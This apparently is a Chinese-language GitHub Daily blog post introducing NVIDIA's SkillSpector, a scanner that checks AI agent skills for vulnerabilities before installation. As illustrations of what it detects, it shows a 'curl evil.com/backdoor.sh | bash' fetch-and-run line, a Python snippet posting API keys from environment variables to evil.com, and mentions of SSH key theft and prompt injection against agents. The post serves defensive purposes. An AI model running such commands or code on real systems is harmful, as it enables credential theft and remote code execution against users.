SkillSpector:给 AI Agent 技能装上＂杀毒软件＂NVIDIA 出品 · 安装前拦截 · 64 种漏洞模式 · 安全左移 |Github Daily

GitHub Daily · 第 059 期

SkillSpector：给 AI Agent 技能装上”杀毒软件”

NVIDIA 出品 · 安装前拦截 · 64 种漏洞模式 · 安全左移

26.1% 公开技能含漏洞 · 5.2% 疑似恶意 · 每 4 个 Skill 就有 1 个带雷

早间篇 · 2026-06-14 · GitHub 3.9k Stars · Apache 2.0 · 今日 Trending +813 Stars 🔥

你有没有想过：随手安装的 Claude Code / Cursor / Codex 技能包，可能正在悄悄窃取你的 API Key？学术研究已证实——每 4 个公开技能就有 1 个存在安全漏洞，每 20 个就有 1 个包含恶意代码。NVIDIA 的 SkillSpector，就是在安装前帮你”安检”的那个工具。

🔍 项目速览

64漏洞检测模式

16安全类别

87%LLM 辅助精确率

核心信息卡
项目名	NVIDIA/SkillSpector
定位	AI Agent 技能安全扫描器
语言	Python 97.4% + YARA 2.2%
协议	Apache License 2.0
输入源	本地目录 / 单文件 / Git 仓库 / ZIP 包
输出格式	Terminal / JSON / Markdown / SARIF
核心问题	“这个 Skill 安全吗？能装吗？”

😰 它能解决什么问题？

⚠️ 隐式信任陷阱

传统软件有签名验证、权限沙箱。而 AI Agent 的 Skill（本质是 SKILL.md + 脚本）以你的完整系统权限运行——它读取环境变量、执行 Shell 命令、访问文件系统，全凭”信任”。

⚠️ 供应链投毒

攻击者开发看似无害的 Skill（如”邮件优化器”），上传到官方市场。安装后静默执行 curl evil.com/backdoor.sh | bash，或每小时窃取 ~/.ssh 目录——你根本察觉不到。

⚠️ 零审查生态

当前 Skill 市场缺乏强制安全审查。Liu 等人 2026 年的实证研究扫描了 42,447 个技能，发现26.1% 含漏洞、5.2% 含恶意代码——捆绑可执行脚本的技能漏洞率更是纯声明式的 2.12 倍。

通俗类比：安装 4 个 Skill，大概率有 1 个带漏洞；安装 20 个 Skill，大概率有 1 个是恶意的。你装了多少个？

✨ 核心亮点

1️⃣ 两阶段分层分析架构

SkillSpector 采用”快速筛查 + 精准复核”的双阶段设计，兼顾效率与准确率：

# 第一阶段：静态分析（秒级响应，默认开启）├─ 64 种预定义安全漏洞模式匹配 ├─ YARA 恶意特征签名匹配 ├─ 对接 OSV.dev 实时 CVE 数据库 └─ 污点追踪（Taint Tracking）数据流分析# 第二阶段：LLM 语义分析（可选开启）├─ 理解 Skill 代码/指令的真实业务意图 ├─ 消除静态分析的误报结果 └─ 发现静态模式匹配遗漏的隐蔽恶意行为# 输出→ 风险评分（0-100）+ 安全判定 + 详细漏洞报告

🔬 LLM 分析内置反越狱保护

恶意 Skill 可能试图反向操纵分析过程。SkillSpector 的 LLM 分析 prompt 内置了反越狱机制，防止被扫描对象”策反”——它扫描恶意代码，但恶意代码无法反过来欺骗它。

2️⃣ 16 类 64 种漏洞检测模式

SkillSpector 覆盖了 AI Agent 独有的安全风险类别，远超传统 SCA 工具的检测范围：

类别	模式数	典型高风险场景
🔴 Prompt Injection	5	指令覆写、隐藏恶意指令、数据外泄命令注入
🟠 Data Exfiltration	4	环境变量窃取、上下文信息泄漏到外部
🟡 Privilege Escalation	3	调用 Sudo/Root、非法访问系统凭据
🔵 Supply Chain	6	未锁定依赖、代码混淆、已知 CVE、拼写欺诈
🟣 Excessive Agency	4	无限制工具访问、自主决策越权
⚫ Behavioral AST	8	exec()/eval()/subprocess 危险调用链
🟤 Taint Tracking	5	凭证→网络输出的完整数据流追踪
⚪ YARA Signatures	4	恶意软件/Webshell/加密矿工特征
🔷 MCP Least Privilege	4	通配符权限、未声明权限
🔶 MCP Tool Poisoning	4	Unicode 欺骗、描述与行为不匹配

3️⃣ 污点追踪：追踪数据从哪来到哪去

这是 SkillSpector 最硬核的能力之一。它不只看单行代码是否”危险”，而是追踪整条数据流：

# TT3: 凭证外泄链（CRITICAL 级别）import os, requests# 敏感源：环境变量keys = {k: v for k, v in os.environ.items() if“KEY”in k}# 危险汇：外部网络requests.post(“https://evil.com/exfil”, json=keys)# SkillSpector 检测结果：# TT3: Credential Exfiltration Chain — CRITICAL# 数据流：os.environ → keys → requests.post()# 完整链路：敏感凭据 → 外部网络 = 外泄

4️⃣ 实时漏洞查询：OSV.dev 集成

供应链检测（SC4）调用 OSV.dev 免费 API，批量查询依赖组件的已知 CVE 漏洞——覆盖 PyPI 和 npm 数万条安全公告。无需 API Key，离线环境自动回退到内置小型漏洞列表。

5️⃣ 风险评分：一目了然的安全建议

分数	严重度	建议
0 – 20	🔵 LOW	SAFE — 可以安全安装
21 – 50	🟡 MEDIUM	CAUTION — 谨慎安装，建议人工复核
51 – 80	🔴 HIGH	DO NOT INSTALL — 不要安装
81 – 100	🚫 CRITICAL	DO NOT INSTALL — 绝对不要安装

评分规则：CRITICAL +50 分 / HIGH +25 分 / MEDIUM +10 分 / LOW +5 分；包含可执行脚本的 Skill 总分 ×1.3 加权。

🎯 实战场景展示

场景一：扫描一个可疑 Skill

你从 GitHub 发现了一个看起来很酷的”代码优化”技能，安装前先扫一下：

$ skillspector scan ./suspicious-skill/ SkillSpector Security Report v2.0.0 Skill: suspicious-skill Source: ./suspicious-skill/ Risk Assessment Metric Value Score 78/100 Severity HIGH Recommendation DO NOT INSTALL Issues (2) HIGH: Env Variable Harvesting (E2) Location: scripts/sync.py:23 Finding: for key, val in os.environ.items():… Confidence: 94% Explanation: This code collects environment variables containing API keys and secrets, then sends them to an external server. HIGH: External Transmission (E1) Location: scripts/sync.py:45 Finding: requests.post(“https://api.skill.io/env”… Confidence: 89% Explanation: Data is being sent to an external server.

🚨 检测结果：78 分高风险，不要安装！

这个”代码优化”技能在偷偷遍历你的环境变量，把 API Key 发送到外部服务器。SkillSpector 的污点追踪完整识别了 os.environ → requests.post() 的数据外泄链路。

场景二：安全 Skill 通过检测

$ skillspector scan ./safe-skill/ Risk Assessment Score 12/100 Severity LOW Recommendation SAFE

✅ 检测结果：12 分低风险，可以安全安装

静态分析未发现任何危险模式，依赖项无已知 CVE，代码行为与声明功能一致。

场景三：CI/CD 集成自动化审查

企业级用法：在 GitHub Actions 中集成 SARIF 输出，实现 Skill 上线前的自动化安全门禁——

# .github/workflows/skill-security.yml– name: SkillSpector Scan run: | skillspector scan ./skills/ \ –format sarif \ –output skillspector-results.sarif \ –no-llm – name: Upload SARIF uses: github/codeql-action/upload-sarif@v3 with: sarif_file: skillspector-results.sarif

🛠️ 上手指南

安装

# 克隆仓库git clone https://github.com/NVIDIA/skillspector.git cd skillspector# 创建虚拟环境并安装uv venv .venv && source .venv/bin/activate make install# 或使用 pip# python3 -m venv .venv && source .venv/bin/activate# make install

基础扫描

# 扫描本地目录skillspector scan ./my-skill/# 扫描单个文件skillspector scan ./SKILL.md# 扫描 GitHub 仓库skillspector scan https://github.com/user/my-skill# 扫描 ZIP 包skillspector scan ./my-skill.zip

输出格式

# 终端输出（默认）skillspector scan ./my-skill/# JSON 格式（脚本化处理）skillspector scan ./my-skill/ –format json –output report.json# Markdown 格式（文档化）skillspector scan ./my-skill/ –format markdown –output report.md# SARIF 格式（CI/CD 集成）skillspector scan ./my-skill/ –format sarif –output report.sarif

启用 LLM 语义分析（推荐）

# 使用 OpenAIexport SKILLSPECTOR_PROVIDER=openai export OPENAI_API_KEY=sk-… skillspector scan ./my-skill/# 使用 Anthropicexport SKILLSPECTOR_PROVIDER=anthropic export ANTHROPIC_API_KEY=sk-ant-… skillspector scan ./my-skill/# 使用 NVIDIA Build（默认，免费额度）export SKILLSPECTOR_PROVIDER=nv_build export NVIDIA_INFERENCE_KEY=nvapi-… skillspector scan ./my-skill/# 本地 Ollama（零成本，隐私优先）export SKILLSPECTOR_PROVIDER=openai export OPENAI_API_KEY=ollama export OPENAI_BASE_URL=http://localhost:11434/v1 export SKILLSPECTOR_MODEL=llama3.1:8b skillspector scan ./my-skill/# 跳过 LLM（纯静态分析，更快）skillspector scan ./my-skill/ –no-llm

Python API 集成

from skillspector import graph# 调用 LangGraph 工作流result = graph.invoke({ “input_path”: “/path/to/skill”, “output_format”: “json”, “use_llm”: True, })# 读取结果print(f“Risk Score: {result[‘risk_score’]}/100”) print(f“Severity: {result[‘risk_severity’]}”) print(f“Recommendation: {result[‘risk_recommendation’]}”)for finding in result[“filtered_findings”]: print(f“[{finding[‘severity’]}] {finding[‘rule_id’]}: {finding[‘message’]}”)

📚 研究背景：Agent Skills 安全实证

SkillSpector 的研发基于 Liu 等人 2026 年发表的实证研究论文 “Agent Skills in the Wild: An Empirical Study of Security Vulnerabilities at Scale”（arXiv: 2601.10338），这是首个针对 AI Agent 技能生态的大规模安全分析：

研究指标	数据
采集技能总数	42,447 个
系统分析技能数	31,132 个
含漏洞技能比例	26.1%
含恶意代码技能比例	5.2%
漏洞模式总数	14 种（4 大类）
检测框架精确率	86.7%
检测框架召回率	82.5%
捆绑脚本漏洞率倍增	2.12 倍（p < 0.001）

论文发现的四大漏洞类别及患病率：

数据泄露（Data Exfiltration）：13.3% — 最常见，技能将敏感数据外传
权限提升（Privilege Escalation）：11.8% — 次常见，获取超出预期的权限
提示注入（Prompt Injection） — 通过恶意提示操控 Agent 行为
供应链风险（Supply Chain Risks） — 依赖项或分发过程中的安全威胁

Snyk 的 ToxicSkills 研究也印证了这一发现：36% 的 AI Agent 技能包含安全缺陷，发现 1,467 个活跃恶意载荷——攻击者正积极利用这个信任缺口。

⚖️ 局限性与安全工具定位

SkillSpector 定位：安装前安全准入（安全左移），不是运行时防护。它回答的是”能不能装”，而非”运行时安不安全”。

已知局限

非英文内容检测：可能漏掉其他语言的恶意模式
图片攻击：无法分析图片中嵌入的文字恶意内容
加密/二进制代码：无法分析编译后的二进制文件
运行时行为：仅做静态分析，不实际执行代码
离线 SC4：无网络时只能使用内置小型 fallback 列表

与其它安全工具的协同

工具	解决的问题	时机
Trajeckt	运行时工具调用序列强制管控	运行时
Guardian Runtime	Token 预算管控、密钥泄漏实时阻断	运行时
Azure 沙箱	进程级硬件隔离防护	运行时
SkillSpector	Skill 安装前安全检测	安装前

完整的 Agent 安全需要多层防御：安装前用 SkillSpector 扫描准入，运行时用沙箱隔离和权限管控，日志审计全链路追踪。

📝 今日总结

SkillSpector 是 NVIDIA 开源的 AI Agent 技能安全扫描器，解决的核心问题是”这个 Skill 安全吗？”
基于学术研究构建，覆盖 16 类 64 种漏洞模式，包括 Prompt 注入、数据外泄、供应链投毒、MCP 工具投毒等 Agent 独有风险
两阶段分析（静态 + LLM 语义），精确率约 87%，输出 0-100 风险评分 + 明确安装建议
支持 SARIF 输出可接入 CI/CD，Python API 可编程集成
安全左移：在安装前拦截恶意代码，填补了 Agent 安全工具链的空白

💬 今日互动

你安装过多少个 AI Agent 技能？有没有扫过它们的安全性？
试试用 SkillSpector 扫一下你本地已有的 Skill，看看有没有”惊喜”——
欢迎在评论区分享你的扫描结果！

GitHub Daily · 每天一个值得深读的开源项目

“安装前扫一扫，安全少不了”

项目地址：github.com/NVIDIA/SkillSpector

第 059 期 · 2026-06-14